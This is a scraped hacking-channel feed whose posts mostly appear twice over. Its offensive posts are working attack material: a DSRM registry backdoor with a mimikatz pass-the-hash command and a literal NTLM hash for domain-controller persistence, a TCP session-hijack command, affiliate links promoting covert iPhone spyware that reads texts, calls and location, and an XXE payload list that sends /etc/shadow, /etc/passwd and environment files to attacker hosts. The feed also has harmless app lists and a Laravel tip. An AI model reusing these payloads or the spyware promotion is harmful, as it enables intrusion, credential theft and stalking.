β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to use DSRM password synchronization to persist domain management authority ?
1) Modify the registry to allow remote access to DSRM accounts
2) Modify the value of DSRMAdminLogonBehavior under the registry HKLM\System\CurrentControlSet\Control\Lsa path to 2.
PS: DSRMAdminLogonBehavior does not exist by default, please add it manually.
3) Use HASH to remotely log in to the domain controller
In any host in the domain, start the Frenchman artifact and execute
Privilege::debug
sekurlsa::pth /domain:WIN2K8-DC /user:Administrator /ntlm:bb559cd28c0148b7396426a80e820e20
4) A CMD will pop up, as shown in the lower right corner of the figure below. This CMD has the authority to access the domain control. The CMD in the lower left corner is a local CMD started directly by Ctrl+R, and you can see that you do not have permission to access the domain control.
A note
5) The DSRM account is the local administrator account of the domain controller, not the domain administrator account. Therefore, the DSRM password synchronization will not affect the domain administrator account. In addition, the value of NTLM remains valid until the next DSRM password synchronization. Therefore, in order to ensure the persistence of permissions, especially in multinational domains or large intranets with hundreds or thousands of domains, it is best to filter the event log with the event ID 4794 in the security events of the event viewer to determine whether the domain management is frequent Perform DSRM password synchronization operations.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to use DSRM password synchronization to persist domain management authority ?
1) Modify the registry to allow remote access to DSRM accounts
2) Modify the value of DSRMAdminLogonBehavior under the registry HKLM\System\CurrentControlSet\Control\Lsa path to 2.
PS: DSRMAdminLogonBehavior does not exist by default, please add it manually.
3) Use HASH to remotely log in to the domain controller
In any host in the domain, start the Frenchman artifact and execute
Privilege::debug
sekurlsa::pth /domain:WIN2K8-DC /user:Administrator /ntlm:bb559cd28c0148b7396426a80e820e20
4) A CMD will pop up, as shown in the lower right corner of the figure below. This CMD has the authority to access the domain control. The CMD in the lower left corner is a local CMD started directly by Ctrl+R, and you can see that you do not have permission to access the domain control.
A note
5) The DSRM account is the local administrator account of the domain controller, not the domain administrator account. Therefore, the DSRM password synchronization will not affect the domain administrator account. In addition, the value of NTLM remains valid until the next DSRM password synchronization. Therefore, in order to ensure the persistence of permissions, especially in multinational domains or large intranets with hundreds or thousands of domains, it is best to filter the event log with the event ID 4794 in the security events of the event viewer to determine whether the domain management is frequent Perform DSRM password synchronization operations.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HOME SECURITY APPS :
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.ivideon.client&hl=en
https://play.google.com/store/apps/details?id=com.mcu.reolink
https://play.google.com/store/apps/details?id=com.ivuu&hl=en
https://play.google.com/store/apps/details?id=com.surveillancesystem.isecurity&hl=en
https://itunes.apple.com/us/app/reolink/id995927563?mt=8
https://itunes.apple.com/us/app/presence-free-smart-home-motion/id618598211?mt=8
https://itunes.apple.com/us/app/isentry/id396777365?mt=8
https://itunes.apple.com/us/app/athome-camera-mobile-home/id305567000?mt=8
https://itunes.apple.com/us/app/alarm.com/id315010649?mt=8
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HOME SECURITY APPS :
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.androidauthority.app
https://play.google.com/store/apps/details?id=com.ivideon.client&hl=en
https://play.google.com/store/apps/details?id=com.mcu.reolink
https://play.google.com/store/apps/details?id=com.ivuu&hl=en
https://play.google.com/store/apps/details?id=com.surveillancesystem.isecurity&hl=en
https://itunes.apple.com/us/app/reolink/id995927563?mt=8
https://itunes.apple.com/us/app/presence-free-smart-home-motion/id618598211?mt=8
https://itunes.apple.com/us/app/isentry/id396777365?mt=8
https://itunes.apple.com/us/app/athome-camera-mobile-home/id305567000?mt=8
https://itunes.apple.com/us/app/alarm.com/id315010649?mt=8
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network sniffing :
sniffglue is a network sniffer written in rust. Network packets are parsed concurrently using a thread pool to utilize all cpu cores. Project goals are that you can run sniffglue securely on untrusted networks and that it must not crash when processing packets. The output should be as useful as possible by default.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt install debian-keyring
2) gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc
3) echo deb http://apt.vulns.sexy stable main > /etc/apt/sources.list.d/apt-vulns-sexy.list
4) apt update
5) apt install sniffglue
6) sniff with default filters (dhcp, dns, tls, http)
sniffglue enp0s25
7) increase the filter sensitivity (arp)
sniffglue -v enp0s25
8) increase the filter sensitivity (cjdns, ssdp, dropbox, packets with valid utf8)
sniffglue -vv enp0s25
9) almost everything
sniffglue -vvv enp0s25
10) everything
sniffglue -vvvv enp0s25
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network sniffing :
sniffglue is a network sniffer written in rust. Network packets are parsed concurrently using a thread pool to utilize all cpu cores. Project goals are that you can run sniffglue securely on untrusted networks and that it must not crash when processing packets. The output should be as useful as possible by default.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt install debian-keyring
2) gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc
3) echo deb http://apt.vulns.sexy stable main > /etc/apt/sources.list.d/apt-vulns-sexy.list
4) apt update
5) apt install sniffglue
6) sniff with default filters (dhcp, dns, tls, http)
sniffglue enp0s25
7) increase the filter sensitivity (arp)
sniffglue -v enp0s25
8) increase the filter sensitivity (cjdns, ssdp, dropbox, packets with valid utf8)
sniffglue -vv enp0s25
9) almost everything
sniffglue -vvv enp0s25
10) everything
sniffglue -vvvv enp0s25
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Chinese companies want to stop providing data abroad in contravention of certain jurisdictions
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LEARN PROGRAMMING VIA IOS/ANDROID APPLICATIONS :
https://play.google.com/store/apps/details?id=com.zenva.codemurai&hl=en_US
https://play.google.com/store/apps/details?id=com.zenva.codemurai&hl=en_US
https://apps.apple.com/us/app/codehub-github-for-ios/id707173885?ls=1
https://apps.apple.com/in/app/programming-hub-learn-to-code/id1049691226
https://play.google.com/store/apps/details?id=com.freeit.java&hl=en_IN
https://itunes.apple.com/app/apple-store/id469863705?pt=698519&ct=website%20footer&mt=8
https://play.google.com/store/apps/details?id=org.khanacademy.android&referrer=utm_source%3Dwebsite%2520footer%26utm_medium%3Dwebsite%2520footer%26utm_campaign%3Dwebsite%2520footer
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LEARN PROGRAMMING VIA IOS/ANDROID APPLICATIONS :
https://play.google.com/store/apps/details?id=com.zenva.codemurai&hl=en_US
https://play.google.com/store/apps/details?id=com.zenva.codemurai&hl=en_US
https://apps.apple.com/us/app/codehub-github-for-ios/id707173885?ls=1
https://apps.apple.com/in/app/programming-hub-learn-to-code/id1049691226
https://play.google.com/store/apps/details?id=com.freeit.java&hl=en_IN
https://itunes.apple.com/app/apple-store/id469863705?pt=698519&ct=website%20footer&mt=8
https://play.google.com/store/apps/details?id=org.khanacademy.android&referrer=utm_source%3Dwebsite%2520footer%26utm_medium%3Dwebsite%2520footer%26utm_campaign%3Dwebsite%2520footer
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Codemurai - Learn Coding - Apps on Google Play
Learn coding languages and frameworks, including HTML, CSS, JS, Python, & Unity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME NEW KEYLOGGERS IOS SPECIALIST:
β’ Keylogging;
β’ Monitor calls β both call logs and recordings;
β’ Monitor texts, emails, browsing history;
β’ Monitor instant messaging and social media apps β Facebook, WhatsApp, Viber, Yahoo;
β’ View contacts, media files, app usage;
β’ Track GPS location.
http://mspy.go2cloud.org/aff_c?offer_id=2&aff_id=4774&url_id=99
http://www.mobile-spy.com/iphone.html
http://maxxspy.com/
https://highstermobile.com/
https://www.flexispy.com/
https://xnspy.com/
https://spyera.com/#nvlv
https://www.spyzie.com/
https://pumpic.com/keylogger-for-iphone.html
https://store.payproglobal.com/r?u=https://ikeymonitor.com/&a=2378
ENJOYβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME NEW KEYLOGGERS IOS SPECIALIST:
β’ Keylogging;
β’ Monitor calls β both call logs and recordings;
β’ Monitor texts, emails, browsing history;
β’ Monitor instant messaging and social media apps β Facebook, WhatsApp, Viber, Yahoo;
β’ View contacts, media files, app usage;
β’ Track GPS location.
http://mspy.go2cloud.org/aff_c?offer_id=2&aff_id=4774&url_id=99
http://www.mobile-spy.com/iphone.html
http://maxxspy.com/
https://highstermobile.com/
https://www.flexispy.com/
https://xnspy.com/
https://spyera.com/#nvlv
https://www.spyzie.com/
https://pumpic.com/keylogger-for-iphone.html
https://store.payproglobal.com/r?u=https://ikeymonitor.com/&a=2378
ENJOYβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HEX EDITORS FOR TERMUX :
hexcurse
Use pkg install hexcurse to install a console hex editor.
Homepage: https://github.com/LonnyGomes/hexcurse
ired
Use pkg install ired to install a minimalist hexadecimal editor.
Homepage: https://github.com/radare/ired
radare2
Use pkg install radare2 to install an advanced hexadecimal editor.
Homepage: https://rada.re
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HEX EDITORS FOR TERMUX :
hexcurse
Use pkg install hexcurse to install a console hex editor.
Homepage: https://github.com/LonnyGomes/hexcurse
ired
Use pkg install ired to install a minimalist hexadecimal editor.
Homepage: https://github.com/radare/ired
radare2
Use pkg install radare2 to install an advanced hexadecimal editor.
Homepage: https://rada.re
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - LonnyGomes/hexcurse: Hexcurse is a ncurses-based console hexeditor written in C
Hexcurse is a ncurses-based console hexeditor written in C - LonnyGomes/hexcurse
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This plugin for Termux provides
1) beautiful color schemes
2) powerline-ready fonts to customize the appearance of the terminal.
> Long-press anywhere on the Termux terminal and use the "Style" menu entry to use after installation
π¦DOWNLOAD:
https://f-droid.org/packages/com.termux.styling/
https://f-droid.org/repo/com.termux.styling_28.apk
Download : https://f-droid.org/packages/com.termux.styling/
That's itπ€
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This plugin for Termux provides
1) beautiful color schemes
2) powerline-ready fonts to customize the appearance of the terminal.
> Long-press anywhere on the Termux terminal and use the "Style" menu entry to use after installation
π¦DOWNLOAD:
https://f-droid.org/packages/com.termux.styling/
https://f-droid.org/repo/com.termux.styling_28.apk
Download : https://f-droid.org/packages/com.termux.styling/
That's itπ€
β β β Uππ»βΊπ«Δπ¬πβ β β β
f-droid.org
Termux:Styling | F-Droid - Free and Open Source Android App Repository
Customize your Termux terminal
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦tcp connection hijacker, rust rewrite of shijack :
This was written for TAMUctf 2018, brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated, there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done, then inject a tcp packet into the telnet connection:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/kpcyrd/rshijack.git
2) cd rshijack
3) Docker
If needed, rshijack can be pulled as a docker image. The image is currently about 10.2MB.
docker run -it --init --rm --net=host kpcyrd/rshijack eth0 172.16.13.20:37386 172.16.13.19:23
4) The way this works is by sniffing for a packet of a specific connection, then read the SEQ and ACK fields. Using that information, it's possible to send a packet on a raw socket that is accepted by the remote server as valid.
β git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦tcp connection hijacker, rust rewrite of shijack :
This was written for TAMUctf 2018, brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated, there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done, then inject a tcp packet into the telnet connection:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/kpcyrd/rshijack.git
2) cd rshijack
3) Docker
If needed, rshijack can be pulled as a docker image. The image is currently about 10.2MB.
docker run -it --init --rm --net=host kpcyrd/rshijack eth0 172.16.13.20:37386 172.16.13.19:23
4) The way this works is by sniffing for a packet of a specific connection, then read the SEQ and ACK fields. Using that information, it's possible to send a packet on a raw socket that is accepted by the remote server as valid.
β git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
kpcyrd/rshijack
tcp connection hijacker, rust rewrite of shijack. Contribute to kpcyrd/rshijack development by creating an account on GitHub.
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WANT TO KNOW WHO IS ON YOUR WIFI ?
BEST APPS:
https://play.google.com/store/apps/details?id=com.etwok.netspotapp
https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&hl=en
https://play.google.com/store/apps/details?id=org.speedspot.wififinder&hl=en
https://play.google.com/store/apps/details?id=com.overlook.android.fing&hl=en
https://play.google.com/store/apps/details?id=com.northbridge.wifisignalstrength
https://play.google.com/store/apps/details?id=lksystems.wifiintruder&hl=en
https://play.google.com/store/apps/details?id=de.android.telnet
https://play.google.com/store/apps/details?id=com.staircase3.opensignal&hl=en
https://play.google.com/store/apps/details?id=com.etwok.netspotapp
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WANT TO KNOW WHO IS ON YOUR WIFI ?
BEST APPS:
https://play.google.com/store/apps/details?id=com.etwok.netspotapp
https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&hl=en
https://play.google.com/store/apps/details?id=org.speedspot.wififinder&hl=en
https://play.google.com/store/apps/details?id=com.overlook.android.fing&hl=en
https://play.google.com/store/apps/details?id=com.northbridge.wifisignalstrength
https://play.google.com/store/apps/details?id=lksystems.wifiintruder&hl=en
https://play.google.com/store/apps/details?id=de.android.telnet
https://play.google.com/store/apps/details?id=com.staircase3.opensignal&hl=en
https://play.google.com/store/apps/details?id=com.etwok.netspotapp
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
NetSpot WiFi Heat Map Analyzer - Apps on Google Play
NetSpot: WiFi heatmap, internet speed test, site survey, WiFi planner, inspector
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Determining if the Current User is Authenticated :
#ProTips
1) Use Auth::check().
The Auth::check() method returns true or false.
if (Auth::check())
{
echo "Yay! You're logged in.";
}
2) Several things happen behind the scenes when you do this.
> First Laravel checks if the current session has the id of a user. If so, then an attempt is made to retrieve the user from the database.
3) If that fails, then Laravel checks for the βremember meβ cookie. If thatβs present then once again an attempt is made to retrieve the user from the database.
4) Only if a valid user is retrieved from the database is true returned.
5) The βguestβ filter uses this method
Laravel provides a default implementation of the guest filter in app/filters.php.
Route::filter('guest', function()
{
if (Auth::check()) return Redirect::to('/');
});
6) This default implementation is used when you want to add a filter to a route that is only accessible by guests (aka users who are not logged in). If a user is logged in then they are redirected to the home page.
Unixforu
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Determining if the Current User is Authenticated :
#ProTips
1) Use Auth::check().
The Auth::check() method returns true or false.
if (Auth::check())
{
echo "Yay! You're logged in.";
}
2) Several things happen behind the scenes when you do this.
> First Laravel checks if the current session has the id of a user. If so, then an attempt is made to retrieve the user from the database.
3) If that fails, then Laravel checks for the βremember meβ cookie. If thatβs present then once again an attempt is made to retrieve the user from the database.
4) Only if a valid user is retrieved from the database is true returned.
5) The βguestβ filter uses this method
Laravel provides a default implementation of the guest filter in app/filters.php.
Route::filter('guest', function()
{
if (Auth::check()) return Redirect::to('/');
});
6) This default implementation is used when you want to add a filter to a route that is only accessible by guests (aka users who are not logged in). If a user is logged in then they are redirected to the home page.
Unixforu
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦XXE PAYLOADS LIST :
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>
## External dtd: ##
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">
-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>
## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">
------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>
## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: %
--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>
## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"
source https://gist.github.com/staaldraad/01415b990939494879b4
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦XXE PAYLOADS LIST :
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>
## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>
## External dtd: ##
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">
-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>
## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">
------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>
## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: %
--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>
## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"
source https://gist.github.com/staaldraad/01415b990939494879b4
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Gist
XXE Payloads
XXE Payloads. GitHub Gist: instantly share code, notes, and snippets.